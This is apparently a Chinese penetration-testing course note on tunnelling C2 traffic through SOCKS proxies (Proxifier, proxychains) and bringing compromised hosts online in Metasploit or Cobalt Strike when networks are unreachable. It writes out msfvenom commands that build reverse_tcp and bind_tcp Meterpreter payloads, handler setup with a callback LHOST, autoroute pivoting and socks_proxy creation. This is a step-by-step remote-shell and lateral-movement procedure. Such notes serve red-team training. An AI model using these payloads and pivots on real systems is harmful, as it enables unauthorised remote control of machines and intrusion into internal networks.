代理通讯篇&无外网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

#代理技术-SockS配置-网络不可达-通讯解决

解决:信息收集打点和漏洞利用部分

注意:配置连接IP为C2服务器IP

工具:Proxifier Proxychains等

Proxifier使用:

直接看课程演示图形化操作

配置代理服务器为csIP地址

配置代理规则ip地址为想要通讯的主机 然后用cs的ip地址为代理

然后开始漏洞打点 假如上传到后门要上传正向后门

刚开始是192.168.139.144反向链接192.168.139.141 后期用cs正向链接192.168.2.22 因为反向链接的话 网络达不到

Proxychains使用:

加入修改配置: /etc/proxychains4.conf

调用加载测试: proxychains4 curl http://192.168.2.22

C2平台:MSF/CS/Sliver/Viper等

实现步骤:

1、在被控机器上获取下一级网段

2、在被控及其上建立SockS节点

3、在工具上配置连接属性和规则触发

#代理技术-正反向监听-网络不可达-C2上线

C2平台:MSF/CS/Sliver/Viper等

实现步骤:

反向监听器:reverse

正向监听器:bind(需主动连接)

CS操作:

直接看课程演示图形化操作

MSF操作命令:

配置反向上线:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.128 LPORT=3333 -f exe -o msf.exe

use exploit/multi/handler(用来收集信息的)

set payload windows/meterpreter/reverse_tcp(反向payload)

set lhost 0.0.0.0

set lport 3333

run

查看路由表:

run autoroute -p

run post/multi/manage/autoroute

创建socks节点:

auxiliary/server/socks_proxy

配置正向上线:

msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe

use exploit/multi/handler

set payload windows/meterpreter/bind_tcp

set rhost xx.xx.xx.xx

set lport 6666

run

相关推荐
南棱笑笑生6 小时前
20251217给飞凌OK3588-C开发板适配Rockchip原厂的Buildroot【linux-5.10】后调通ov5645【只能预览】
linux·c语言·开发语言·rockchip
aduzhe7 小时前
int32 - int32MAX 出现异常
c语言·stm32
摘星编程10 小时前
Ascend C编程语言详解:打造高效AI算子的利器
c语言·开发语言·人工智能
自然常数e10 小时前
深入理解指针(6)
c语言·数据结构·算法·visual studio
一杯美式 no sugar10 小时前
数据结构——栈
c语言·数据结构·
CQ_YM11 小时前
Linux线程控制
linux·c语言·开发语言·线程
lingran__11 小时前
C语言字符函数和字符串函数详解
c语言·开发语言
white-persist12 小时前
【攻防世界】reverse | simple-check-100 详细题解 WP
c语言·开发语言·汇编·数据结构·c++·python·算法
☆cwlulu13 小时前
C/C++ 内存分配函数详解
c语言·c++
程芯带你刷C语言简单算法题16 小时前
Day30~实现strcmp、strncmp、strchr、strpbrk
c语言·学习·算法·c